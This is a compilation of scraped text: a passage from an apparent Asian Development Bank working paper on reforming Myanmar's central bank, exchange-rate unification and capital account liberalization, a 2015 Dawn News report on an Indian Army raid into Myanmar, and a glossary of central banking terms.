finance sectors, summarizing them chronologically. 2011 September October November 2012 January April July August November December 2013 March July August November Ongoing Reforms Started in 2012 Expected to finish within 2015 Myanmar Payment Union set up to develop a payment and settlement system. Central Bank of Myanmar (CBM) grants money changing licenses to authorized dealers. CBM grants foreign exchange licenses to authorized dealers. CBM grants currency remittance services to private authorized banks for Myanmar workers overseas. Myanmar Microfinance Law passed. CBM starts deposit auctions. CBM starts exchange rate unification and daily foreign exchange auctions. CBM changes its exchange rate system from a fixed exchange rate to a managed float. Tax on transfers of export proceeds lifted. CBM grants authorized banks permission to maintain foreign currency accounts for international banking services. Foreign exchange management law enacted. a Parliament approves new Foreign Investment Law. Framework for Economic and Social Reform (FESR). b Simplification of the reserve requirement. Parliament approves minimum wage recommendations. Parliament approves the Central Bank of Myanmar Law. Foreign exchange interbank market launched. Mobile banking services launched. Special Economic Zone Law. Foreign banks allowed to compete in the domestic market. Establishing a real-time gross settlement system and other fundamentals supporting the payment and settlement system. Establishing an equities exchange. a The law removed all exchange rate restrictions and also eliminated multicurrency practices. b Key measures under FESR include land reform, improved access to credit, and creating job opportunities. Source: Central Bank of Myanmar. http://www. cbm. gov. mm

9 Monetary Policy and Foreign Exchange Management: Reforming Central Bank Functions in Myanmar 3 The unification of the foreign exchange markets was at the heart of the banking and financial reforms. Here, the government-sanctioned market based on the official exchange rate and the allocation system coexisted with informal, parallel exchange rates and the presence of multiple rates was clearly a significant distortion. In April 2012, the two markets were unified under a managed float. A daily foreign exchange auction is now held between commercial banks and the CBM, which determines official foreign exchange rates based on true market conditions. This has narrowed the gap between the official rate and the parallel exchange rate. Greater exchange rate flexibility has also allowed the economy to adjust better to changing economic conditions via movements in the exchange rate. This reform was followed by the introduction of the Foreign Exchange Management Law in 2012 and the Central Bank Act in 2013. Given Myanmar s long years of economic controls and isolation, these initial reforms were bold initiatives aimed at removing economic distortions and providing the legal foundations for the authorities to move toward a market-based economy. The reforms were well-received and, together with the progress made in political reform, sparked renewed interest in Myanmar and the country s economic opportunities. The reforms were quickly followed by the lifting of economic sanctions by a number of foreign governments, which improved business confidence and created a surge of interest in investment and trade by foreign investors and governments. Thanks to these developments, the economy picked up markedly in 2012, with a more broadbased expansion of economic activities, driven by foreign investment, increased government spending, and much improved business sentiment. On the production side, the pick-up in activity included expansion in agriculture, extractive industries, and services; the latter benefiting considerably from the resurgence of foreign interest in business and tourism, as well as the influx of foreign capital. But with the economy s limited absorptive capacity, this increased demand and spending immediately put pressure on the current account, inflation, and asset prices. From the perspective of macroeconomic policy, the reforms in 2012 have not been followed by broad-based improvement or reform in other areas of macroeconomic management and economic institutions, including monetary policy and central banking functions. As a result, the economy has failed to take full advantage of the reforms, especially exchange rate unification. The benefits of this have not trickled down to the business community and have failed to ignite or sustain a pick-up in economic activity. Furthermore, the economic activity has not been fully supported by a stable macroeconomic environment, which could have resulted had there been improvements in other areas of fiscal and monetary policy management. Indeed, there has been a conspicuous absence of momentum in private sector growth following the reforms, despite the large influx of foreign capital. Against this backdrop, an urgent agenda is to reform the macroeconomic policy, legal, and institutional frameworks to enable the economy to leverage the benefits of existing reforms and pave the way for further ones to support the development of a market-based economy. In the current setting, given the prominent role of the CBM, a key priority is to equip the monetary authority with new capacities to perform full-fledged monetary policy and other central banking functions that support the country s growth and stability. Most important in this context are capacities to operate monetary policy, stabilize financial markets, and maintain economic and financial stability.

10 4 ADB Economics Working Paper Series No. 431 Table 1: Myanmar s Key Economic Indicators, FY2000 FY2010 FY2000 FY2001 FY2002 FY2003 FY2004 FY2005 FY2006 FY2007 FY2008 FY2009 FY2010 Output and prices (% change) Real GDP growth 5.5 5.0 5.5 0.0 5.0 4.5 7.0 5.5 3.6 5.1 5.3 CPI (period average) (1.7) 34.5 58.1 24.9 3.8 10.7 26.3 32.9 22.5 8.2 8.2 Public sector (% of GDP) Total revenue 5.3 4.7 5.0 4.6 6.5 6.7 7.7 14.1 13.1 10.7 11.4 Total expenditure 13.6 10.5 8.6 9.5 11.2 10.0 11.9 17.9 15.5 15.6 16.9 Net lending (+) / borrowing (-) (8.4) (5.8) (3.6) (4.9) (4.7) (3.3) (4.3) (3.8) (2.4) (4.9) (5.4) Domestic public debt 25.0 22.5 19.5 19.1 21.3 19.6 18.6 16.5 16.8 18.7 21.0 Money and credit (% change) Broad money 47.4 43.2 18.4 11.0 33.3 25.1 27.1 21.0 23.4 34.8 36.3 Domestic credit 44.7 36.6 24.4 14.5 33.8 24.5 27.4 22.1 24.0 34.8 34.4 Private sector 52.7 56.9 1.0 (36.6) 39.0 22.2 16.4 16.7 16.2 36.9 65.4 Balance of payments (% of GDP, unless otherwise) Current account balance 4.1 (4.3) 1.7 0.2 2.4 3.7 7.1 0.4 (2.9) (1.3) (1.9) Trade balance 1.3 (4.7) 7.0 4.3 8.8 12.9 15.6 4.6 1.0 1.3 0.9 Exports 25.1 32.1 33.2 20.8 27.5 29.5 35.9 31.9 23.1 19.9 17.4 Imports (23.8) (35.4) (26.2) (16.5) (18.7) (16.5) (20.3) (27.3) (22.1) (18.6) (16.5) Balance of payments (% of GDP, unless otherwise) Exports ($ million) 2,451.0 2,484.0 2,912.0 2,818.0 2,902.0 3,531.0 5,203.0 6,446.0 7,241.0 7,578.0 8,629.0 Imports ($ million) (2,319.0) (2,736.0) (2,300.0) (2,240.0) (1,973.0) (1,984.0) (2,937.0) (5,522.0) (6,938.0) (7,067.0) (8,184.0) Financial account (1.0) 0.0 (0.7) (0.2) 0.6 (1.1) 0.4 3.3 2.6 4.0 6.8 Net FDI 2.1 2.5 2.2 0.9 2.4 2.0 3.0 3.5 3.1 2.5 4.5 Net FDI ($ million) 208.0 192.0 191.0 128.0 251.0 236.0 428.0 715.0 976.0 963.0 2,249.0 Overall balance (3.2) 1.3 (0.7) (0.3) (0.1) (0.4) 8.1 4.0 0.4 2.2 0.8 Gross official reserves ($ million) 269.0 524.0 619.0 781.0 873.0 1,026.0 2,503.0 3,054.0 3,629.0 2,809.0 3,754.0 Gross official reserves (months of total imports) 1.4 2.3 3.2 4.2 5.3 4.2 5.4 6.6 6.3 3.7 3.9 continued on next page

11 Monetary Policy and Foreign Exchange Management: Reforming Central Bank Functions in Myanmar 5 Table 1 continued FY2000 FY2001 FY2002 FY2003 FY2004 FY2005 FY2006 FY2007 FY2008 FY2009 FY2010 Total external debt (% of GDP) 60.8 78.1 67.5 45.7 64.3 58.7 50.4 40.0 29.0 36.1 29.0 Total external debt ($ billion) 5,936.0 6,042.0 5,919.0 6,205.0 6,797.0 7,038.0 7,303.0 8,082.0 9,101.0 13,800.0 14,400.0 Terms of trade (% change) 2.8 (23.1) (0.7) 4.6 7.3 8.5 16.4 1.7 6.2 4.0 (2.9) Official exchange rate (kyat dollar, end of period) 6.7 6.8 6.2 5.7 5.6 5.9 5.6 5.2 5.8 5.7 5.4 Memorandum items GDP (kyat billion) 2,553.0 3,548.0 5,625.0 7,717.0 9,079.0 12,287.0 16,853.0 23,336.0 28,778.0 34,958.0 39,847.0 GDP ($ billion) 9.8 7.7 8.8 13.6 10.6 12.0 14.5 20.2 31.4 38.1 49.6 GDP per capita ($) 178.0 129.0 130.0 197.0 195.0 216.0 257.0 350.0 533.0 587.0 742.0 ( ) = negative, CPI = consumer price index, FDI = foreign direct investment, FY = fiscal year, GDP = gross domestic product. Note: Myanmar s fiscal year ends 31 March of the following year, such that FY2010 starts on 1 April 2010 and ends on 31 March 2011. Source: International Monetary Fund, Myanmar: Article IV Consultation, various years.

12 6 ADB Economics Working Paper Series No. 431 II. LAYING A MACRO POLICY FOUNDATION TO SUPPORT A MARKET-BASED ECONOMY In the early 1980s, the Central Bank of Burma, as it was then known, was a full-fledged central bank with a strong reputation as a member of the Southeast Asian Central Banks Association and in the league of today s top ASEAN central banks. Since then, however, Myanmar s long period of international isolation and the increased role of the government in the economy reduced the CBM s role in economic management. Today, with the passage of the new Central Bank of Myanmar Law in 2013, the CBM has gained operational independence and is building its monetary policy framework. However, the central bank continues to suffer from inadequate tools to manage liquidity and control inflation. While an over-the-counter market exists for government treasuries, all interest rates are administratively set. There is no interbank market and the CBM does not conduct open market operations. Building a well-functioning monetary policy framework and greater central banking capacity will require effort on three fronts. The first is to dismantle the existing nonmarket arrangements, largely in the finance sector, that have inhibited efficient functioning of financial markets and efficient allocation of financial resources. The second is to put in place a monetary policy framework, process, and procedures suitable for managing and supporting a market-based economy. The third is to enhance policy capacities at the CBM by elevating its policy process, central banking functions, and institutional roles to match the tasks of a modern central bank for a market-based economy. From our assessment, taking the current CBM s capacities and policy process as a starting point, the reform priorities are: Broad-based liberalization and development of the banking sector and financial markets to support private sector activities, especially as the economy's growth shifts away from agriculture, requiring greater monetization of the economy. Liberalization of the foreign exchange market to improve private sector access to foreign currencies. This would replace the current allocation system with a market-based system allowing domestic commercial banks to trade foreign exchange under a policy set by the CBM, consistent with the International Monetary Fund s Article IV stipulation. A new monetary policy framework focusing on price stability that is operationally consistent with the managed floating exchange rate regime. Enhancement of the CBM s financial market s operation capacity to enable it to influence through market mechanisms the economy's cost of funds and liquidity in line with monetary policy decision, and to guide the costs of the fund to the economy via an efficient transmission mechanism. Removal of the fiscal deficit financing role of the CBM (that is, the monetization of government debt in the primary government securities market) and replacing it with open market operations by the central bank in government securities in the secondary market. This is to provide the CBM with a key policy instrument to guide and control the country s cost of funds through a market mechanism. Enhancement of the CBM's ability to conduct smooth foreign exchange policy by strengthening its reserve management and intervention capabilities. This includes the unification of international reserves holdings and management.

13 Monetary Policy and Foreign Exchange Management: Reforming Central Bank Functions in Myanmar 7 Creation of macroprudential tools at the CBM to ensure better handling of the stability risk of volatile capital flows, and doing so within a policy framework that integrates monetary policy and financial policy. Creation of a new system of data reporting between the CBM and financial institutions that allows the monitoring of the country's economic and financial condition, and using this information to assist in the conduct of monetary policy. Implementing reforms in these eight areas is a priority. This requires, among other things, correct sequencing and careful and well-paced dismantling of the existing distortions so as not to disrupt the real economy. For implementation, the reforms can be managed with the CBM s existing capacity, supported by a team of central bank experts. The reform challenge is achievable, and it is worth noting that a number of central banks in former ASEAN transitional economies underwent a similar reform process; for example, Viet Nam in the 1990s, Cambodia from 1995 to 1999, and the Lao People s Democratic Republic in the 1980s. Myanmar can learn from the successful experience of these countries. The experience of these countries of moving from a highly regulated economy to a marketbased one shows reform is required in three stages. The first is the rudimentary step that equips the central bank with a basic monetary policy process and the capacity to enable it to perform essential central banking functions. For Myanmar, this will include a new monetary policy framework, backed by the CBM s capacity to operate in financial markets. In the first stage, some controls of market transactions and prices as well as deposit and lending interest rates may still be required to limit volatility and ensure an orderly market adjustment and stability. One example that could be drawn upon is the ±0.8% band for the exchange rate within which authorized foreign exchange dealers can buy or sell in the retail market. The second stage is a well-functioning monetary policy that operates almost entirely on market-based instruments and mechanisms. This presupposes that a set of market institutions and a certain level of financial market development are in place. In this stage, market-based policy instruments play a larger role than direct controls in the operation of monetary policy. But the effectiveness of market-based policy instruments is typically hampered by the evolving nature of a country s financial markets, which, at this stage, tends to lack completeness, depth, and scale. The monetary policy framework in place, however, does enable the central bank to adequately operate monetary policy and maintain economic stability. The current state of monetary policy operations in Viet Nam, Cambodia, and the Lao People s Democratic Republic are operating at this second stage. The third stage is where monetary policy and other central banking functions are operated fully through financial markets (Thailand and Malaysia are at this stage). Here, the complexities of financial markets are such that the effects of monetary policy on the economy are transmitted through all the channels of the transmission mechanism, including price, quantity, and expectations. At this stage, global financial markets and policy spillovers become major influencers of monetary policy formulation. Guided by these experiences, the reform of Myanmar's monetary policy framework and the CBM s capacity will also need to be tackled in stages. For Myanmar, the objective of the first step is to endow the central bank with the capacity to operate a market-based monetary policy and other central banking functions to support a market-based economy. In this context, it is our view that the priorities for the CBM at this stage will be:

14 8 ADB Economics Working Paper Series No. 431 A well-defined monetary policy framework focused on maintaining low and stable inflation, and is operationally consistent with the managed floating exchange rate regime. Market-based monetary policy tools to support monetary policy operations and liquidity management. An operating short-term money market to support the CBM's monetary policy operations and the transmission mechanism for monetary policy. This would include an interbank market for domestic liquidity, a bond market to support the CBM's open market operations, and a repo market to support liquidity management. Adequate capacity at the CBM to operate the managed floating exchange rate regime. This should include strengthening intervention capacity; pooling foreign exchange reserves with centralized management for liquidity and investment; back-office support for reserves management; and market operations to ensure efficiency, transparency, and good governance. An approval-based foreign exchange control process to support the purchase and sale of foreign exchange between banks and customers based on rules set by the CBM. This is to ensure orderly and open access to foreign exchange by the private sector for their trade and investment needs that can be supported by the country's foreign exchange reserves. A well-defined monetary policy process that allows monetary policy decisions to be made in a structured and credible manner. This includes a process for appointing members of a monetary policy committee, meetings at regular intervals, data and analysis, and market communication. A lender of last resort function for the CBM consistent with its legal role under the new central bank law, as well as the policy tools necessary for the CBM to manage the impact of large capital movements. In addition, a facility could be established to enable the central bank to perform a developmental role. A system of data reporting and dissemination between the CBM and commercial banks needs to be established to enable the central bank to have data of internationally accepted standards to monitor financial markets and the economy, and to provide a basis for policy decisions. The aim should be to have a data reporting standard on par with the International Monetary Fund s Report on the Observance of Standards and Codes process. A program of capacity building to allow the CBM's senior management and professional staff to operate within the new macroeconomic policy framework. The focus here should be the development of a core CBM team capable of operating the institution s foreign exchange and monetary policy, financial market s operations, reserve management, and supporting and making CBM policy decisions. Ideally, this should be a core team of about 20 to 25 people covering all levels of seniority to lead the transformation of the CBM. A set of governance principles and codes of conduct for the CBM s board and central bank staff to guide operations, build credibility, and preserve the institution s independence. The issues here will be the processes for board appointments and the working relationships among the board, management, and CBM's key policy committees, as well as the working relationships with the government, financial institutions, and the public. Implementing these 10 areas of reform should be an immediate task for the CBM. The following section looks at the modalities of these reforms. III. FOREIGN EXCHANGE FRAMEWORK, OPERATION, AND EXCHANGE CONTROL From 1977 until the recent reforms, the official kyat exchange rate was fixed to the value of the International Monetary Fund s Special Drawing Rights. But because of the unrealistic level of the

15 Monetary Policy and Foreign Exchange Management: Reforming Central Bank Functions in Myanmar 9 official exchange rate and strict controls on foreign exchange, Myanmar s economy operated with a de facto multiple exchange rate system where huge distortions, including the allocation system of foreign exchange operated by the state banks, forced the private sector to rely on informal markets for foreign exchange. To eliminate these distortions, the government unified the exchange rate market by replacing the old system with a managed float. The new system came into effect on 1 April 2012. Under the old system, the official dollar kyat (MK) rate was fixed at MK6.4236 to the dollar. The day after the managed float came into effect, the CBM announced the first foreign exchange auction under the new system, with the first daily fixing at MK818 to the dollar. Initially, 11 private banks holding authorized foreign exchange dealer licenses were eligible to participate, and they were later joined by three state-owned banks along with the private banks. The auction is a daily two-way trade. Participants are required to submit their sealed buying/selling orders by 8:30 a. m. and the auction results are posted on the CBM s website at 9:30 a. m. on the same day. Actual exchange rates quoted by individual retail money changers can vary between ±0.8% of the CBM s reference rate. For wholesale authorized dealers, the maximum quoted spread is currently ±0.3%. The Thein Phyu Pricing Committee, an authorized group of private bank foreign exchange dealers, may collectively reset its midrate in the afternoon should market conditions change significantly from the morning auction. This provides the market with a tool to adjust more flexibly to intraday volatility. A. Limitations of the Foreign Exchange Auction The CBM has no predetermined target for the exchange rate, and since the introduction of the auction, the kyat has gradually depreciated against the dollar. Although the transition to the new foreign exchange system went smoothly and the unification was hailed as a success, there are policy and operational limitations in the current system. These can be addressed to improve the effectiveness of foreign exchange management in the following ways: Transparency. Transparency of the auction process, especially information on the modalities of the process to be made public. Intraday volatility. As the auction is conducted only once a day, there is a risk of significant intraday volatility; this means the CBM must be ready to intervene, if needed, to contain volatility. Adequacy of international reserves held by the CBM. The amount of official reserves may need to be increased to give the central bank more room to stabilize the foreign exchange market. And to assure financial markets of its foreign exchange management capability, the CBM may want to increase official reserves preferably through reserves pooling to enhance its capacity to manage the exchange rate. Access to global money markets. Because of a prolonged period of economic sanctions, the CBM and domestic financial institutions have been isolated from global financial markets. The economy relies on the flows of international trade and investment for its access to foreign currency earnings and proceeds. Even though sanctions have been mostly lifted or suspended, access to global money markets is still far from normal. Local banks remain reluctant to have their dollar settlement accounts held with the Federal Reserve given uncertainty over partial sanctions by the US government and also because local banks at the early stage of their foreign exchange business tend to prefer accumulating foreign currency to strengthen their foreign exchange position rather than actively participating in the local interbank market.

16 10 ADB Economics Working Paper Series No. 431 Efficiency of markets and instruments for banks to manage liquidity. The CBM has put in place a deposit auction as an instrument for absorbing domestic liquidity both for price (interest rate) discovery and for sterilization. This allows banks to adjust excess liquidity with the CBM. However, with less-than-active participation from private banks, the deposit auction is still in its early development stage. Thus, there is room for further reform of CBM facilities to enable private banks to better adjust their liquidity needs with the central bank. Access to foreign exchange. This is still a problem for the private sector. Fixing it requires dismantling the central role that Myanma Foreign Trade Bank plays in the allocation of foreign exchange and replacing it with a commercially based foreign exchange operation through the banking sector as a whole. B. Moving to More Effective Foreign Exchange Management To improve the effectiveness of foreign exchange management and to liberalize access to foreign exchange for the private sector, the CBM could pursue further reform in the following areas: Increase the CBM s intervention capacity. The CBM could improve its capacity to effectively intervene in the foreign exchange market by pooling the international reserves from the state-owned banks to be centralized at the central bank with a single account and centralized reserves management. This will require a legal arrangement backed by government authority to facilitate such a transfer, with the CBM issuing central bank bills in local currency to cover the transfer. Enhance the ability of banks to adjust their foreign exchange positions and liquidity. Although the CBM has successfully started an interbank foreign exchange market since August 2013, its low market turnover shows that this has not been well-received by banks. Trade volume is thin and driven by just a few transactions. To further develop the interbank foreign exchange market and provide banks with more facilities to adjust their foreign and local currency positions, a number of new facilities could be introduced, such as: (i) A swap facility as a liquidity management tool that allows the CBM to manage foreign exchange liquidity through banks, and vice versa. (ii) Allowing and facilitating banks to enter the global foreign exchange market for better hedging and risk mitigation of banks balance sheets. (iii) Greater scope for foreign exchange operations by banks to allow more flexibility for authorized dealers to autonomously manage their exposure within domestic and international interbank markets. C. Capital Account Liberalization and Managing Capital Flows Before the political and economic reforms, international trade and capital movement was limited owing to sanctions. Trade and investment were small-scale and mostly with neighboring countries, such as the People s Republic of China and Thailand. Economic reforms have brought sizable capital flows back to Myanmar and ignited private sector investment. One important consequence of the inflows has been a worsening of the current account balance that reflects a sharp rise in investment activity and in the imports of capital goods for mega-project investments. The deficit in the external current account is expected to rise further on the back of the country s positive medium-term outlook and possible further lifting of economic sanctions. These deficits will need to be financed either by foreign direct investment (FDI) or by other forms of foreign capital. Therefore, accompanying the

17 Monetary Policy and Foreign Exchange Management: Reforming Central Bank Functions in Myanmar 11 current account deficits, continuing capital inflows could pose serious stability risks to the economy. These include overheating, inflation, asset-price bubbles, financial instability, and sudden reversals in capital flows. These risks need to be monitored and managed. To safeguard the economy, especially during surges in capital flows, the CBM needs to be equipped with a variety of instruments that can be used to discourage excessive inflows of foreign capital, especially short-term capital, or deal with the macro implication of such flows, or both. Many of these instruments will be monetary policy and the macroprudential tools that the CBM already has in place to maintain price and financial stability. But in addition to these instruments, the CBM can effectively control foreign capital flows in and out of Myanmar with its capital account liberalization policy. This is another important policy area that the central bank needs to develop by defining clearly the appropriate degree of openness for capital flows, both on the inflow and outflow sides. This means rules and regulations that set the conditions for foreign investors to bring capital into Myanmar and for domestic residents to take capital out of the country. The benefits and risks of capital account liberalization are well-understood. On the inflow side, capital account liberalization not only enhances efficiency in resource allocation, but also improves the competitiveness of the local finance sector. Capital inflows in the form of FDI help transfer technology and management practices, help develop the finance sector, instill macroeconomic policy discipline, and promote trade and investment efficiency. But capital account liberalization also brings risks; to manage them, the CBM will have to decide on the extent of liberalization. Furthermore, the scope of international capital flows should be consistent with the CBM s ability to manage the risks. Box 2 presents a guide for safe capital account liberalization. Box 2: Preconditions for Safe Capital Account Liberalization Stable macroeconomic and financial conditions. A credible exchange rate arrangement that is supported by adequate reserves can reduce risks related to capital flow volatility. Low and stable inflation can help reduce the risk of capital inflow surges that stem from carry trade and capital flight triggered by worsening market expectations. Building and maintaining macroeconomic and finance sector buffers can also reduce the risk of capital inflow surges. A sustainable fiscal position and manageable public sector and external debt reduce the likelihood of adverse macroeconomic effects of capital flow retrenchment while providing room to accommodate private sector outflows. Finance sector ability to deal with increased capital flow volatility. Liberalizing and developing the finance sector, and ensuring sound governance and risk management in financial institutions, helps strengthen the ability to deal with capital flows. Evaluating the resilience of banks balance sheets to shocks in capital flows requires attention in the following issues: (i) the level of reliance on deposits, (ii) adequacy of net open foreign exchange position limits or exchange rate risk management practices, (iii) credit risk associated with exchange rate depreciation due to a large share of foreignexchange-denominated or inflation-linked loans, and (iv) high levels of nonperforming loans. High standards of governance and disclosure. Adherence to international accounting standards, transparency, and shareholder protection standards facilitates the liberalization of foreign direct investment and portfolio flows. It also allows for proper pricing of stocks and securities and reduces the vulnerability of finance and nonfinance corporate sectors to risks related to greater openness. Strong finance sector regulatory standards and effective supervisory framework. Adequate micro and macroprudential regulations can significantly contribute to containing the risks of greater openness. Cooperation agreements with supervisory authorities of other countries can facilitate the detection and management of financial stability risks. An adequate deposit guarantee framework can help local banks retain residents deposits. Proper crisis preparedness and resolution frameworks gain importance in a context of increased capital flow volatility and potential contagion. Adequate prudential regulations need to be in place on institutional investors foreign investments before liberalizing capital outflows. Reforms also need to address the risk that operations through the informal finance sector can undermine the effectiveness of the prudential framework in the formal finance sector.

18 12 ADB Economics Working Paper Series No. 431 Box 2 continued continued on next page Efficient monitoring system. Reporting and information systems should be put in place for monitoring factors contributing to capital flow movements to assess the potential risk of financial system instability and the necessity of temporarily reimposing capital flow management measures. Source: International Monetary Fund 2013. D. Sequencing Capital Account Liberalization 2 A good approach to capital account liberalization is to do it in stages, beginning with a small opening then gradually increasing its scope. This applies both to the liberalization of capital inflows by foreigners and capital outflows by residents. The rule of thumb is: long-term before short-term, FDI and other nondebt before debt, and inflows before outflows. The sequencing must be done in such a way that the preconditions underlying each stage are identified, beginning, obviously, with the supporting reforms. Putting conditions on capital account transactions will help the CBM to manage the exchange rate and ensure effective transmission of monetary policy. The conditions underlying the sequencing, meanwhile, will help guide the CBM in responding to financial market s developments, as certain capacities in the domestic financial markets need to be established before moving from one stage to another. We now summarize this process. 1. Prior to Liberalization: Supporting Reforms The immediate priority is to set up a facility for banks to manage and hedge their foreign exchange exposure domestically. Banks should be allowed to manage their foreign exchange liquidity among themselves. Introducing the foreign exchange interbank market would be the major initial step toward greater flexibility for banks. The CBM should also introduce more flexible instruments and other market supportive fundamentals; for example, currency swap markets, forward markets, a reference rate, and a yield curve. 2. Stage I Liberalize FDI inflows and certain short-term bank-related flows to facilitate trade and financial transactions for clients of financial institutions (for example, trade finance, and allowing banks to open accounts with banks abroad). This stage also lays the groundwork for further liberalization by introducing international accounting standards and improving national statistics. The monetary framework and finance sector regulation also need to be strengthened at this stage. 3. Stage II Liberalize FDI outflows and inflows into traded securities (for example, listed bonds and equities). This stage introduces FDI outflows and long-term portfolio flow liberalization. Some short-term flows can also be liberalized at this stage. Liberalizing inflows into equities may present fewer complications than bonds, given the potential of equities for greater risk-sharing and market-deepening. Bond market development could also benefit from foreign participation enlarging the investor base. Some countries have taken advantage of liberalizing inflows into traded securities to lengthen maturities (for example, initially allowing inflows only for long maturities). In this stage, prudential controls on banks open 2 This mainly draws on International Monetary Fund (2013).

19 Monetary Policy and Foreign Exchange Management: Reforming Central Bank Functions in Myanmar 13 positions will need to continue, especially to limit the large-scale use of short-term foreign currency borrowing to fund domestic currency lending, along with prudential rules on domestic lending in foreign exchange. 4. Stage III Progressively lift controls on outflows, and allow greater participation of foreign investors in other assets. This stage eliminates all remaining controls after developing the financial markets and further strengthens the finance sector by implementing prudential regulations and supervision to ensure the risk management of international capital flows. E. Access to Foreign Exchange: New Rules and Regulations Foreign exchange deregulation and capital account liberalization help international trade payments, foreign investment, and economic development. However, they also bring risks that include greater volatility in the macroeconomic system and more vulnerability to crises. Deregulation of the foreign exchange business can be the next key policy reform in Myanmar, and ensuring that the benefits of this reform trickle down fully to the business community while maintaining economic and financial stability. In these circumstances, a new system of foreign exchange allocation is needed, as already discussed. Ideally, all foreign exchange transactions would be conducted through commercial banks and authorized nonbanks, with any other transactions requiring approval from the CBM. The following is a brief description of a system of foreign exchange rules and regulations, similar to that of Thailand, which the CBM could adopt. It is an open system that involves commercial banks selling and buying foreign exchange directly with their customers under rules and regulations set by the central bank. Foreign currency regulations. Foreign currency is normally transferred or brought into the country without limits, though caps may be imposed in certain circumstances, subject to rules set by the central bank. Any person receiving foreign currency from abroad is required to repatriate the funds immediately and sell them to an authorized bank or deposit them in a foreign currency account with an authorized bank within a certain number of days. Exceptions are made for foreigners staying for short durations, such as employees of embassies and international organizations. Purchase of foreign currency. Private firms should generally be allowed to purchase foreign currency from authorized banks after submitting documents indicating international trade and investment needs or they could hedge against foreign exchange risk. Foreign currency account with authorized banks. In Thailand, residents may hold foreign currency accounts with authorized banks, and deposit or withdraw funds under certain conditions. There are limits on currency deposits and withdrawals to prevent speculation, and both transactions need supporting documents. Nonresidents may hold foreign currency accounts with authorized banks without limits, but the funds must originate from aboard. Regulations for trade and services. Export proceeds must be repatriated after payment is received or within a certain number of days from the export date. The proceeds must be sold to or deposited in a foreign currency account with an authorized bank. Importers may purchase foreign currency from licensed banks or make withdrawals from their own foreign currency accounts (if allowed) for import payments upon submission of supporting documents. Letters of credits may also be opened without authorization.

Dawn News

NEW DELHI: The Indian Army conducted on Tuesday a cross-border revenge attack in Myanmar in which it killed nearly a dozen militants thought to be involved in the massacre of 18 soldiers last week in Manipur, reports said.

The troubled northeastern Indian state borders Myanmar. While Indian officials say separatist rebels seek refuge in the heavily forested border region of Myanmar, there has been no official comment on the raid reported by the Mail Today.

There were reports earlier this week, according to the paper, saying India had given Myanmar phone intercepts and location details of at least two officials from the Chinese People’s Liberation Army (PLA), who were allegedly in touch with the top leadership of the insurgent group, NSCN-Khaplang, suspected to be behind the Manipur killing. There was no official comment on the report.

The paper said Tuesday’s strike was done in coordination with the Myanmar government after “the clearance to conduct the surgical strikes was given at the highest level”.

Delhi claims intercepting Chinese link in last week’s attack in Manipur

The paper quoted an Indian Army spokesman as saying: “Any threat to safety, security and national integrity will meet with a similar response.”

“Army sources in the Eastern Command had said the ambush was carried out by 15 members of the Kanglei Yawol Kanna Lup (KYKL), a Meitei outfit formed in 1994,” the Mail Today reported. The KYKL is closely aligned to the NSCN-K that broke off a 14-year ceasefire with the government this April.

Prime Minister Narendra Modi on Thursday condemned the attack on army convoy in Manipur and described it as a “very distressing” and “mindless” assault. The militants used rocket-propelled grenades and automatic weapons to ambush a military convoy killing at least 20 personnel. Reports described it as the worst such attack in recent years. Eleven army men were injured in the ambush.

Reports of the cross-border raid in Myanmar came a day after The Hindu reported from Beijing that the China-India track on a possible new round of confidence-building measures (CBMs) could run into problems.

The Hindu spoke of a contest expected between New Delhi’s insistence on the clarification of the Line of Actual Control (LAC) and Beijing’s focus on the elaboration of a “code of conduct” among border troops.

Diplomatic sources told the paper that the resumption of the clarification of the LAC, which was publicly raised by Mr Modi during his China visit last month, is one of the core objectives of the CBM process.

“It was formally documented in the peace and tranquillity accord that was signed in 1993 in the backdrop of friction such as the one caused during the Wandung incident of 1986 in Arunachal Pradesh. Neither side wanted a repeat of such an eventuality,” unnamed sources told the paper.

They emphasised that the spirit behind LAC clarification, which was raised by Mr Modi, was to prevent inadvertent incidents along the border. “Unless we have a reliable reference point, which a clarified LAC would provide, there is always a danger of inadvertent border incidents on the ground or in the air,” the paper quoted the unnamed sources as saying.

The China-Pakistan Economic Corridor is another recent point of disagreement between India and China.

Published in Dawn, June 10th, 2015

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Central Banking and Monetary Policy Concepts:

What is a Central Bank? A central bank central bank is an institution that issues currency, regulates money supply, controls interest rates, oversees financial market and financial system stability and operations. Many central banks also have an oversight role for the banking industry in their jurisdiction; having input into policy and regulations and the implementation thereof. Central Banks may also be referred to as: Reserve Banks, Monetary Authorities, State Banks, and National Banks. parte superior

What is Monetary Policy? Monetary Policy is a process whereby the central bank or monetary authority of a country controls and adjusts the supply of money, in conjunction with tools such as interest rate targets, required reserve ratios, currency measures, etc. The goal of monetary policy is usually focused on maintaining stability; both economic stability and price stability. Monetary policy often contends with the contrasting goals of economic growth, low inflation, and optimal employment.

Monetary policy settings are usually referred to as either 'expansionary' or 'contractionary'. Expansionary monetary policy settings are where monetary conditions are easy, e. g. low interest rates, expansionary settings encourage growth and are often implemented to counter recessions and unemployment. Contractionary conditions are when monetary policy is tighter, e. g. higher interest rates, and are often implemented to act against inflationary pressures, or rising prices. parte superior

Central Banking and Monetary Policy Terminology:

Interest Rate The interest rate is the rate at which interest is paid by a borrower for the use of money that they borrow from a lender. Many central banks set a target, or official, interest rate as part of the implementation of monetary policy. Examples of such interest rates include: Fed Funds rate (US Federal Reserve), Official Cash Rate (RBNZ), Bank Rate (Bank of England), Refinancing Rate (Central Bank of Russia). See our listing of global central bank interest rates. parte superior

Required Reserve Ratio The required reserve ratio or cash reserve ratio is the amount of minimum cash and reserves that the central bank requires commercial banks to hold (rather than lend out) as a proportion of customer deposits and notes. In essence, it limits how much the bank can lend; thus by altering the level of the ratio the central bank can influence the growth of credit which can be important in influencing the level of inflation and economic activity. Required reserve ratios are more commonly used in developing countries and emerging markets, e. g. the People's Bank of China, Central Bank of Russia, Central Bank of Brazil. parte superior

Inflation Target Central banks often operate monetary policy with a goal of price stability, or controlling the rate of inflation in a country. As such many banks have official hard or soft inflation targets. Some banks have targets of a specific number, or a cap level, while other banks target an inflation range; recognising that a small amount of inflation may be better than the risks of deflation, in the context of minimising inflation and maintaining price stability. See our listing of central bank inflation targets. parte superior

Quantitative Easing Quantitative easing is the process by which a central bank or monetary authority purchases financial assets from banks and other institutions with new electronically created money. The effect of this is is an increase in excess reserves of banks, and an increase in the prices of the assets bought; which results in a lower market yield. Quantitative easing is considered an unconventional monetary policy tool. Examples of its use include: Bank of Japan (multiple times), the US Federal Reserve and the Bank of England (following the global financial crisis). parte superior

